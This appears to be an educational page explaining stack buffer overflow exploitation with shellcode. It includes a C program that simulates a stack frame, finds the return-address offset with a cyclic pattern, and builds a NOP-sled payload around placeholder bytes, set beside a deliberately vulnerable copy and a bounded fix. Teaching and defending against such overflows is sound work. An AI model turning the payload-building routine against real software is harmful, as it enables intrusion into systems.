What is the core principle behind exploiting a stack overflow with shellcode?
A stack-based buffer overflow occurs when more data is written into a fixed-size local buffer than it can hold, so the write runs past the end of the buffer into the rest of the stack frame, including the saved return address. When the function returns, the CPU pops the attacker-supplied value instead of the original return address and continues executing there. In the classic form the payload is the shellcode itself, padded (usually with a NOP sled) so that the saved return address is overwritten with an address inside the buffer, which redirects execution straight into the shellcode. Two measurements make this work: the offset from the start of the buffer to the saved return address, and the address the buffer occupies at run time. This technique is demonstrated in detail in the Windows Shellcode Study Notes: Exploitation and Optimization of Shellcode in Stack Overflow article, which shows how to calculate that offset and overwrite the return address with the shellcode's starting address. Note that the unmodified technique assumes an executable stack and a predictable buffer address; DEP/NX, ASLR and stack canaries (/GS) each break one of those assumptions, which is why modern exploits combine the overflow with a jump gadget, an information leak or return-oriented programming.
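The two measurements above (the offset to the saved return address, then the payload layout that overwrites it) can be shown without crashing anything by modelling the frame in memory. The following is an added example written for this page, not code from the article or from any exploit: it constructs a 32-bit-style frame (64-byte buffer, saved EBP, saved return address), finds the offset with a Metasploit-style cyclic pattern, builds a NOP sled + placeholder shellcode + return address payload, and contrasts the unbounded copy with a bounded one. The frame layout, `STACK_LEN`, the `0xCC` placeholder bytes and every address value are assumptions for the model; nothing here executes payload bytes.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a classic 32-bit frame, not a real compiler layout:
 * the local buffer sits lowest, saved EBP and the return address just above. */
#define BUF_LEN   64
#define STACK_LEN 256                 /* bytes an overflow can reach in this model */

struct frame {
    uint8_t  buf[BUF_LEN];            /* strcpy()/memcpy() destination */
    uint32_t saved_ebp;               /* saved frame pointer */
    uint32_t ret_addr;                /* what `ret` pops: the exploit's target */
};
#define RET_OFFSET offsetof(struct frame, ret_addr)   /* 68 in this model */

/* Vulnerable copy: trusts the attacker's length, like strcpy() or recv() into
 * a fixed buffer, so it runs past buf[] into saved_ebp and ret_addr. */
static void vuln_copy(uint8_t *stack, const uint8_t *src, size_t len) {
    for (size_t i = 0; i < len; i++)
        stack[i] = src[i];
}

/* Hardened copy: bounded by the buffer and always NUL-terminated. */
static void safe_copy(uint8_t *stack, const uint8_t *src, size_t len) {
    size_t n = len < BUF_LEN - 1 ? len : BUF_LEN - 1;
    memcpy(stack, src, n);
    stack[n] = 0;
}

/* The modelled target is x86, so addresses are stored little-endian. */
static uint32_t read_ret_addr(const uint8_t *stack) {
    const uint8_t *p = stack + RET_OFFSET;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}
static void put_le32(uint8_t *p, uint32_t v) {
    for (size_t i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i));
}

/* Metasploit-style pattern "Aa0Aa1Aa2...": every 4-byte window is unique in
 * the first 20280 bytes, so the value landing in ret_addr names its offset. */
static size_t pattern_create(uint8_t *out, size_t len) {
    size_t n = 0;
    for (int u = 0; u < 26 && n < len; u++)
        for (int l = 0; l < 26 && n < len; l++)
            for (int d = 0; d < 10 && n < len; d++) {
                uint8_t t[3] = { (uint8_t)('A' + u), (uint8_t)('a' + l), (uint8_t)('0' + d) };
                for (int k = 0; k < 3 && n < len; k++) out[n++] = t[k];
            }
    return n;
}
static long pattern_offset(const uint8_t *pat, size_t len, uint32_t value) {
    uint8_t needle[4];
    put_le32(needle, value);          /* the bytes exactly as they sat in memory */
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) return (long)i;
    return -1;
}

/* Step 1: overflow with the pattern, read what reached ret_addr, look it up. */
long find_ret_offset(void) {
    uint8_t stack[STACK_LEN] = {0}, pat[100];
    size_t n = pattern_create(pat, sizeof pat);
    vuln_copy(stack, pat, n);
    return pattern_offset(pat, n, read_ret_addr(stack));
}

/* Step 2: NOP sled, shellcode ending right under saved_ebp, then the target
 * address at the measured offset. Returns the payload length, 0 on error. */
size_t build_payload(uint8_t *out, size_t out_len,
                     const uint8_t *sc, size_t sc_len, uint32_t target) {
    long off = find_ret_offset();
    if (off < 0) return 0;
    size_t ret_off = (size_t)off, total = ret_off + 4;
    if (out_len < total || sc_len > ret_off) return 0;
    memset(out, 0x90, ret_off);       /* sled: any landing point slides into sc */
    memcpy(out + ret_off - sc_len, sc, sc_len);
    put_le32(out + ret_off, target);  /* would point into the sled on a real stack */
    return total;
}

/* Step 3: deliver through the unbounded copy; `ret` would now pop `target`. */
uint32_t hijacked_ret(uint32_t target) {
    static const uint8_t sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };   /* placeholder, not shellcode */
    uint8_t stack[STACK_LEN] = {0}, payload[STACK_LEN];
    size_t n = build_payload(payload, sizeof payload, sc, sizeof sc, target);
    vuln_copy(stack, payload, n);
    return read_ret_addr(stack);
}

/* Same payload through the bounded copy: the original return address survives. */
uint32_t safe_ret(uint32_t original_ret, uint32_t target) {
    static const uint8_t sc[] = { 0xCC, 0xCC, 0xCC, 0xCC };
    uint8_t stack[STACK_LEN] = {0}, payload[STACK_LEN];
    put_le32(stack + RET_OFFSET, original_ret);
    size_t n = build_payload(payload, sizeof payload, sc, sizeof sc, target);
    safe_copy(stack, payload, n);
    return read_ret_addr(stack);
}

int main(void) {
    printf("offset to saved return address: %ld\n", find_ret_offset());
    printf("ret after overflow: 0x%08x\n", hijacked_ret(0x0012ff40u));   /* assumed stack address */
    printf("ret after bounded copy: 0x%08x\n", safe_ret(0x004010a0u, 0x0012ff40u));
    return 0;
}
```

The pattern step is what "calculate the offset" means in practice: the crash value in EIP is looked up in the pattern rather than counted by hand. The model deliberately stops at what `ret` would pop; on a real Windows target the next questions are whether the buffer address is stable enough to hard-code (ASLR) and whether the stack is executable (DEP), which is where the article's jump-to-shellcode and optimisation steps come in.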
stack overflow, buffer overflow, return address, shellcode execution